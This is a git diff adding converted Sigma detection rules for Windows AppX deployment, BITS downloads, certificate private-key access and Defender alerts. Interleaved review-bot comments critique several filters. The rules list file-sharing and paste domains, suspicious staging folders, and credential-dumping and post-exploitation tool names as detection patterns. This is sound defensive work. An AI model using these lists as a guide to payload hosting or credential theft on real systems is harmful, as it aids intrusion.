diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml
new file mode 100644
index 000000000..f820524a8
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml
@@ -0,0 +1,27 @@
+title: Suspicious AppX Package Installation Attempt
+id: 898d5fc9-fbc3-43de-93ad-38e97237c344
+status: test
+description: Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious
+references:
+ - Internal Research
+ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
+ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
+ - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/11
+tags:
+ - attack.defense_evasion
+logsource:
+ product: windows
+ service: appxdeployment-server
+detection:
+ appxdeployment_server:
+ Channel: Microsoft-Windows-AppXDeploymentServer/Operational
+ selection:
+ EventID: 401
+ ErrorCode: '0x80073cff' # Check ref section to learn more about this error code
+ condition: appxdeployment_server and selection
+falsepositives:
+ - Legitimate AppX packages not signed by MS used part of an enterprise
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml
new file mode 100644
index 000000000..c43119920
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml
@@ -0,0 +1,52 @@
+title: Suspicious Remote AppX Package Locations
+id: 8b48ad89-10d8-4382-a546-50588c410f0d
+status: experimental
+description: Detects an appx package added the pipeline of the "to be processed" packages which is downloaded from a suspicious domain
+references:
+ - Internal Research
+ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
+ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
+ - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/11
+modified: 2023/08/17
+tags:
+ - attack.defense_evasion
+logsource:
+ product: windows
+ service: appxdeployment-server
+detection:
+ appxdeployment_server:
+ Channel: Microsoft-Windows-AppXDeploymentServer/Operational
+ selection:
+ EventID: 854
+ Path|contains:
+ - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea)
+ - anonfiles.com
+ - cdn.discordapp.com
+ - cdn.discordapp.com/attachments/
+ - ddns.net
+ - dl.dropboxusercontent.com
+ - ghostbin.co
+ - gofile.io
+ - hastebin.com
+ - mediafire.com
+ - mega.nz
+ - paste.ee
+ - pastebin.com
+ - pastebin.pl
+ - pastetext.net
+ - privatlab.com
+ - privatlab.net
+ - send.exploit.in
+ - sendspace.com
+ - storage.googleapis.com
+ - storjshare.io
+ - temp.sh
+ - transfer.sh
+ - ufile.io
+ condition: appxdeployment_server and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml
new file mode 100644
index 000000000..9e2770315
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml
@@ -0,0 +1,40 @@
+title: Suspicious AppX Package Locations
+id: 5cdeaf3d-1489-477c-95ab-c318559fc051
+status: test
+description: Detects an appx package added the pipeline of the "to be processed" packages which is located in suspicious locations
+references:
+ - Internal Research
+ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
+ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
+ - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/11
+tags:
+ - attack.defense_evasion
+logsource:
+ product: windows
+ service: appxdeployment-server
+detection:
+ appxdeployment_server:
+ Channel: Microsoft-Windows-AppXDeploymentServer/Operational
+ selection:
+ EventID: 854
+ Path|contains:
+ # Paths can be written using forward slash if the "file://" protocol is used
+ - C:\Users\Public\
+ - /users/public/
+ - C:\PerfLogs\
+ - C:/perflogs/
+ - \Desktop\
+ - /desktop/
+ - \Downloads\
+ - /Downloads/
+ - C:\Windows\Temp\
+ - C:/Windows/Temp/
+ - \AppdData\Local\Temp\
+ - /AppdData/Local/Temp/
+ condition: appxdeployment_server and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml
new file mode 100644
index 000000000..ee7ec5baa
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml
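Review bot: The last two entries of the `Path|contains` list are misspelled as `\AppdData\Local\Temp\` and `/AppdData/Local/Temp/`, so a package staged under the real `\AppData\Local\Temp\` directory never matches this rule and the location the author clearly meant to cover is silently excluded. They should read `- \AppData\Local\Temp\` and `- /AppData/Local/Temp/`. Because this file is a converted copy, the correction has to land in the upstream Sigma rule with id 5cdeaf3d-1489-477c-95ab-c318559fc051 as well, or the next conversion run will reintroduce the typo.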
@@ -0,0 +1,40 @@
+title: Uncommon AppX Package Locations
+id: c977cb50-3dff-4a9f-b873-9290f56132f1
+status: test
+description: Detects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations
+references:
+ - Internal Research
+ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
+ - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
+ - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/11
+tags:
+ - attack.defense_evasion
+logsource:
+ product: windows
+ service: appxdeployment-server
+detection:
+ appxdeployment_server:
+ Channel: Microsoft-Windows-AppXDeploymentServer/Operational
+ selection:
+ EventID: 854
+ filter_generic:
+ Path|contains:
+ # Paths can be written using forward slash if the "file://" protocol is used
+ - C:\Program Files\WindowsApps\
+ - C:\Program Files (x86)\
+ - C:\Windows\SystemApps\
+ - C:\Windows\PrintDialog\
+ - C:\Windows\ImmersiveControlPanel\
+ - x-windowsupdate://
+ - file:///C:/Program%20Files # Also covers 'file:///C:/Program%20Files%20(x86)/'
+ filter_specific:
+ Path|contains:
+ - https://statics.teams.cdn.office.net/
+ - microsoft.com # Example: https://go.microsoft.com/fwlink/?linkid=2160968
+ condition: appxdeployment_server and (selection and not 1 of filter_*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml b/tools/sigmac/converted_rules/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml
new file mode 100644
index 000000000..88a35c0f0
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml
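Review bot: The `microsoft.com` entry in `filter_specific` is a bare substring under `Path|contains`, so it suppresses any package path that carries that text anywhere — in a query string, in a longer hostname, or in a local file name — which is a much wider exclusion than the `go.microsoft.com` example in its own comment. Anchoring it on the scheme and host, for instance `- https://go.microsoft.com/` (and further hosts as they are observed), or moving it to a `Path|startswith` entry, keeps the documented false-positive coverage while leaving the rest of the `selection` intact. The same shape of concern applies to the `.com/` entry of `filter_main_generic` at L3957, but that rule states the trade-off in its `falsepositives` text, so it only needs a similar one-line note here.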
@@ -0,0 +1,27 @@
+title: Suspicious Digital Signature Of AppX Package
+id: b5aa7d60-c17e-4538-97de-09029d6cd76b
+status: test
+description: Detects execution of AppX packages with known suspicious or malicious signature
+references:
+ - Internal Research
+ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/16
+tags:
+ - attack.defense_evasion
+ - attack.execution
+logsource:
+ product: windows
+ service: appxpackaging-om
+detection:
+ appxpackaging_om:
+ Channel: Microsoft-Windows-AppxPackaging/Operational
+ selection:
+ EventID: 157
+ # Add more known suspicious/malicious certificates used in different attacks
+ subjectName: CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization
+ condition: appxpackaging_om and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml
new file mode 100644
index 000000000..8111d31e2
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml
@@ -0,0 +1,27 @@
+title: New BITS Job Created Via Bitsadmin
+id: 1ff315dc-2a3a-4b71-8dde-873818d25d39
+status: test
+description: Detects the creation of a new bits job by Bitsadmin
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
+author: frack113
+date: 2022/03/01
+modified: 2023/03/27
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1197
+logsource:
+ product: windows
+ service: bits-client
+detection:
+ bits_client:
+ Channel: Microsoft-Windows-Bits-Client/Operational
+ selection:
+ EventID: 3
+ processPath|endswith: \bitsadmin.exe
+ condition: bits_client and selection
+falsepositives:
+ - Many legitimate applications or scripts could leverage "bitsadmin". This event is best correlated with EID 16403 via the JobID field
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_powershell.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_powershell.yml
new file mode 100644
index 000000000..a52378e16
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_powershell.yml
@@ -0,0 +1,29 @@
+title: New BITS Job Created Via PowerShell
+id: fe3a2d49-f255-4d10-935c-bda7391108eb
+status: experimental
+description: Detects the creation of a new bits job by PowerShell
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
+author: frack113
+date: 2022/03/01
+modified: 2023/03/27
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1197
+logsource:
+ product: windows
+ service: bits-client
+detection:
+ bits_client:
+ Channel: Microsoft-Windows-Bits-Client/Operational
+ selection:
+ EventID: 3
+ processPath|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ condition: bits_client and selection
+falsepositives:
+ - Administrator PowerShell scripts
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml
new file mode 100644
index 000000000..fa21ec421
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml
@@ -0,0 +1,41 @@
+title: BITS Transfer Job Downloading File Potential Suspicious Extension
+id: b85e5894-9b19-4d86-8c87-a2f3b81f0521
+status: experimental
+description: Detects new BITS transfer job saving local files with potential suspicious extensions
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
+author: frack113
+date: 2022/03/01
+modified: 2023/03/27
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1197
+logsource:
+ product: windows
+ service: bits-client
+detection:
+ bits_client:
+ Channel: Microsoft-Windows-Bits-Client/Operational
+ selection:
+ EventID: 16403
+ LocalName|endswith:
+ # TODO: Extend this list with more interesting file extensions
+ - .bat
+ - .dll
+ - .exe # TODO: Might wanna comment this if it generates tons of FPs
+ - .hta
+ - .ps1
+ - .psd1
+ - .sh
+ - .vbe
+ - .vbs
+ filter_optional_generic:
+ # Typical updates: Chrome, Dropbox etc.
+ LocalName|contains: \AppData\
+ RemoteName|contains: .com
+ condition: bits_client and (selection and not 1 of filter_optional_*)
+falsepositives:
+ - While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml
new file mode 100644
index 000000000..1a7525653
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml
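Review bot: `filter_optional_generic` drops every transfer whose `LocalName` contains `\AppData\` and whose `RemoteName` contains `.com`, and that pair describes a large share of the downloads the `selection` is meant to surface, so the filter removes much of the rule's signal rather than only the updater traffic named in its comment. Narrowing `RemoteName|contains` to the update hosts actually seen in the environment (the comment mentions Chrome and Dropbox) would keep the false-positive reduction without the blanket exclusion; if the broad form is intentional, the `falsepositives` entry should say that the `filter_optional_*` block can be removed by consumers who prefer coverage over noise. The list itself only ends with `.vbs`, so the TODO about extending it is still open as well.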
@@ -0,0 +1,53 @@
+title: BITS Transfer Job Download From File Sharing Domains
+id: d635249d-86b5-4dad-a8c7-d7272b788586
+status: experimental
+description: Detects BITS transfer job downloading files from a file sharing domain.
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
+ - https://twitter.com/malmoeb/status/1535142803075960832
+ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
+author: Florian Roth (Nextron Systems)
+date: 2022/06/28
+modified: 2023/08/17
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1197
+logsource:
+ product: windows
+ service: bits-client
+detection:
+ bits_client:
+ Channel: Microsoft-Windows-Bits-Client/Operational
+ selection:
+ EventID: 16403
+ RemoteName|contains:
+ - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea)
+ - anonfiles.com
+ - cdn.discordapp.com
+ - cdn.discordapp.com/attachments/
+ - ddns.net
+ - dl.dropboxusercontent.com
+ - ghostbin.co
+ - gofile.io
+ - hastebin.com
+ - mediafire.com
+ - mega.nz
+ - paste.ee
+ - pastebin.com
+ - pastebin.pl
+ - pastetext.net
+ - privatlab.com
+ - privatlab.net
+ - send.exploit.in
+ - sendspace.com
+ - storage.googleapis.com
+ - storjshare.io
+ - temp.sh
+ - transfer.sh
+ - ufile.io
+ condition: bits_client and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml
new file mode 100644
index 000000000..084075335
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml
@@ -0,0 +1,78 @@
+title: BITS Transfer Job Download From Direct IP
+id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7
+related:
+ - id: 99c840f2-2012-46fd-9141-c761987550ef
+ type: similar
+status: experimental
+description: Detects a BITS transfer job downloading file(s) from a direct IP address.
+references:
+ - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
+ - https://isc.sans.edu/diary/22264
+ - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
+ - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/11
+modified: 2023/03/27
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1197
+logsource:
+ product: windows
+ service: bits-client
+detection:
+ bits_client:
+ Channel: Microsoft-Windows-Bits-Client/Operational
+ selection:
+ EventID: 16403
+ RemoteName|contains:
+ - http://1
+ - http://2
+ - http://3
+ - http://4
+ - http://5
+ - http://6
+ - http://7
+ - http://8
+ - http://9
+ - https://1
+ - https://2
+ - https://3
+ - https://4
+ - https://5
+ - https://6
+ - https://7
+ - https://8
+ - https://9
+ filter_optional_local_networks:
+ RemoteName|contains:
+ - ://10. # 10.0.0.0/8
+ - ://192.168. # 192.168.0.0/16
+ - ://172.16. # 172.16.0.0/12
+ - ://172.17.
+ - ://172.18.
+ - ://172.19.
+ - ://172.20.
+ - ://172.21.
+ - ://172.22.
+ - ://172.23.
+ - ://172.24.
+ - ://172.25.
+ - ://172.26.
+ - ://172.27.
+ - ://172.28.
+ - ://172.29.
+ - ://172.30.
+ - ://172.31.
+ - ://127. # 127.0.0.0/8
+ - ://169.254. # 169.254.0.0/16
+ filter_optional_seven_zip:
+ RemoteName|contains:
+ # For https://7-zip.org/
+ - https://7-
+ - http://7-
+ condition: bits_client and (selection and not 1 of filter_optional_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
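Review bot: The `selection` matches any `RemoteName` whose host name merely begins with a digit, not only dotted-quad addresses, because `http://1` … `https://9` under `contains` also hit hosts such as `https://1drv.ms/` (OneDrive short links), and only 7-Zip is carved out by `filter_optional_seven_zip`, so the `level: high` alert will fire on some ordinary vendor downloads. If the conversion target supports the Sigma `re` modifier, a pattern anchored on the IPv4 shape such as `RemoteName|re: '://[0-9]{1,3}(\.[0-9]{1,3}){3}'` expresses the intent directly and makes the seven-zip filter unnecessary; otherwise each digit-leading host that shows up in the environment needs its own `filter_optional_*` entry, and the `falsepositives` text should say so instead of `Unknown`.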
diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml
new file mode 100644
index 000000000..7796f954c
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml
@@ -0,0 +1,33 @@
+title: BITS Transfer Job With Uncommon Or Suspicious Remote TLD
+id: 6d44fb93-e7d2-475c-9d3d-54c9c1e33427
+status: experimental
+description: Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
+ - https://twitter.com/malmoeb/status/1535142803075960832
+author: Florian Roth (Nextron Systems)
+date: 2022/06/10
+modified: 2023/03/27
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1197
+logsource:
+ product: windows
+ service: bits-client
+detection:
+ bits_client:
+ Channel: Microsoft-Windows-Bits-Client/Operational
+ selection:
+ EventID: 16403
+ filter_main_generic:
+ RemoteName|contains:
+ - .azureedge.net/
+ - .com/
+ - .sfx.ms/
+ - download.mozilla.org/ # https://download.mozilla.org/?product=firefox-101.0.1-partial-101.0&os=win64&lang=en-US
+ condition: bits_client and (selection and not 1 of filter_main_*)
+falsepositives:
+ - This rule doesn't exclude other known TLDs such as ".org" or ".net". It's recommended to apply additional filters for software and scripts that leverage the BITS service
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml
new file mode 100644
index 000000000..f96ad5b9f
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml
@@ -0,0 +1,31 @@
+title: BITS Transfer Job Download To Potential Suspicious Folder
+id: f8a56cb7-a363-44ed-a82f-5926bb44cd05
+status: experimental
+description: Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
+author: Florian Roth (Nextron Systems)
+date: 2022/06/28
+modified: 2023/03/27
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1197
+logsource:
+ product: windows
+ service: bits-client
+detection:
+ bits_client:
+ Channel: Microsoft-Windows-Bits-Client/Operational
+ selection:
+ EventID: 16403
+ LocalName|contains:
+ # TODO: Add more interesting suspicious paths
+ - \Desktop\
+ - C:\Users\Public\
+ - C:\PerfLogs\
+ condition: bits_client and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/capi2/win_capi2_acquire_certificate_private_key.yml b/tools/sigmac/converted_rules/builtin/capi2/win_capi2_acquire_certificate_private_key.yml
new file mode 100644
index 000000000..d61e45198
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/capi2/win_capi2_acquire_certificate_private_key.yml
@@ -0,0 +1,25 @@
+title: Certificate Private Key Acquired
+id: e2b5163d-7deb-4566-9af3-40afea6858c3
+status: experimental
+description: Detects when an application acquires a certificate private key
+references:
+ - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
+author: Zach Mathis
+date: 2023/05/13
+tags:
+ - attack.credential_access
+ - attack.t1649
+logsource:
+ product: windows
+ service: capi2
+ definition: 'Requirements: The CAPI2 Operational log needs to be enabled'
+detection:
+ capi2:
+ Channel: Microsoft-Windows-CAPI2/Operational
+ selection:
+ EventID: 70 # Acquire Certificate Private Key
+ condition: capi2 and selection
+falsepositives:
+ - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_exploiting.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_exploiting.yml
new file mode 100644
index 000000000..3ac97d0b9
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_exploiting.yml
@@ -0,0 +1,69 @@
+title: Antivirus Exploitation Framework Detection
+id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864
+status: stable
+description: Detects a highly relevant Antivirus alert that reports an exploitation framework
+references:
+ - https://www.nextron-systems.com/?s=antivirus
+ - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797
+ - https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424
+ - https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466
+author: Florian Roth (Nextron Systems), Arnim Rupp
+date: 2018/09/09
+modified: 2023/01/13
+tags:
+ - attack.execution
+ - attack.t1203
+ - attack.command_and_control
+ - attack.t1219
+logsource:
+ category: antivirus
+ product: windows
+ service: windefend
+detection:
+ antivirus:
+ EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'
+ - 1006
+ - 1007
+ - 1008
+ - 1009
+ - 1010
+ - 1011
+ - 1012
+ - 1115
+ - 1116
+ - 1017
+ - 1018
+ - 1019
+ - 1115
+ - 1116
+ Channel: Microsoft-Windows-Windows Defender/Operational
+ selection:
+ ThreatName|contains:
+ - MeteTool
+ - MPreter
+ - Meterpreter
+ - Metasploit
+ - PowerSploit
+ - CobaltStrike
+ - BruteR
+ - Brutel
+ - Swrort
+ - Rozena
+ - Backdoor.Cobalt
+ - CobaltStr
+ - COBEACON
+ - Cometer
+ - Razy
+ - IISExchgSpawnCMD
+ - Exploit.Script.CVE
+ - Seatbelt
+ - Sbelt
+ - Sliver
+ condition: antivirus and selection
+fields:
+ - FileName
+ - User
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_hacktool.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_hacktool.yml
new file mode 100644
index 000000000..15567e5d0
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_hacktool.yml
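Review bot: The `EventID` list under `antivirus` repeats `1115` and `1116` (once after `1012` and again after `1019`), which does not change matching but reads as a copy-paste slip, and the same duplicated list appears verbatim in the av_hacktool, av_password_dumper, av_ransomware, av_relevant_files and av_webshell hunks that follow. Dropping the second `- 1115` / `- 1116` pair, or deduplicating list values in the sigmac conversion step, would keep the generated rules tidy. As these are converted copies of upstream rules, the fix presumably belongs upstream rather than in the converted output.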
@@ -0,0 +1,86 @@
+title: Antivirus Hacktool Detection
+id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba
+status: stable
+description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool
+references:
+ - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/
+ - https://www.nextron-systems.com/?s=antivirus
+author: Florian Roth (Nextron Systems), Arnim Rupp
+date: 2021/08/16
+modified: 2023/02/03
+tags:
+ - attack.execution
+ - attack.t1204
+logsource:
+ category: antivirus
+ product: windows
+ service: windefend
+detection:
+ antivirus:
+ EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'
+ - 1006
+ - 1007
+ - 1008
+ - 1009
+ - 1010
+ - 1011
+ - 1012
+ - 1115
+ - 1116
+ - 1017
+ - 1018
+ - 1019
+ - 1115
+ - 1116
+ Channel: Microsoft-Windows-Windows Defender/Operational
+ selection:
+ - ThreatName|startswith:
+ - HTOOL
+ - HKTL
+ - SecurityTool
+ - Adfind
+ - ATK/
+ - Exploit.Script.CVE
+ # - 'FRP.'
+ - PWS.
+ - PWSX
+ - ThreatName|contains:
+ - Hacktool
+ - ATK/ # Sophos
+ - Potato
+ - Rozena
+ - Sbelt
+ - Seatbelt
+ - SecurityTool
+ - SharpDump
+ - Sliver
+ - Splinter
+ - Swrort
+ - Impacket
+ - Koadic
+ - Lazagne
+ - Metasploit
+ - Meterpreter
+ - MeteTool
+ - Mimikatz
+ - Mpreter
+ - Nighthawk
+ - PentestPowerShell
+ - PowerSploit
+ - PowerSSH
+ - PshlSpy
+ - PSWTool
+ - PWCrack
+ - Brutel
+ - BruteR
+ - Cobalt
+ - COBEACON
+ - Cometer
+ - DumpCreds
+ - FastReverseProxy
+ - PWDump
+ condition: antivirus and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_password_dumper.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_password_dumper.yml
new file mode 100644
index 000000000..401b08f6b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_password_dumper.yml
@@ -0,0 +1,63 @@
+title: Antivirus Password Dumper Detection
+id: 78cc2dd2-7d20-4d32-93ff-057084c38b93
+status: stable
+description: Detects a highly relevant Antivirus alert that reports a password dumper
+references:
+ - https://www.nextron-systems.com/?s=antivirus
+ - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619
+ - https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448
+author: Florian Roth (Nextron Systems)
+date: 2018/09/09
+modified: 2023/01/18
+tags:
+ - attack.credential_access
+ - attack.t1003
+ - attack.t1558
+ - attack.t1003.001
+ - attack.t1003.002
+logsource:
+ category: antivirus
+ product: windows
+ service: windefend
+detection:
+ antivirus:
+ EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'
+ - 1006
+ - 1007
+ - 1008
+ - 1009
+ - 1010
+ - 1011
+ - 1012
+ - 1115
+ - 1116
+ - 1017
+ - 1018
+ - 1019
+ - 1115
+ - 1116
+ Channel: Microsoft-Windows-Windows Defender/Operational
+ selection:
+ - ThreatName|startswith: PWS
+ - ThreatName|contains:
+ - DumpCreds
+ - Mimikatz
+ - PWCrack
+ - HTool/WCE
+ - PSWTool
+ - PWDump
+ - SecurityTool
+ - PShlSpy
+ - Rubeus
+ - Kekeo
+ - LsassDump
+ - Outflank
+ - DumpLsass
+ - SharpDump
+ - PWSX
+ - PWS.
+ condition: antivirus and selection
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_ransomware.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_ransomware.yml
new file mode 100644
index 000000000..044ed3c27
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_ransomware.yml
@@ -0,0 +1,61 @@
+title: Antivirus Ransomware Detection
+id: 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f
+status: test
+description: Detects a highly relevant Antivirus alert that reports ransomware
+references:
+ - https://www.nextron-systems.com/?s=antivirus
+ - https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916
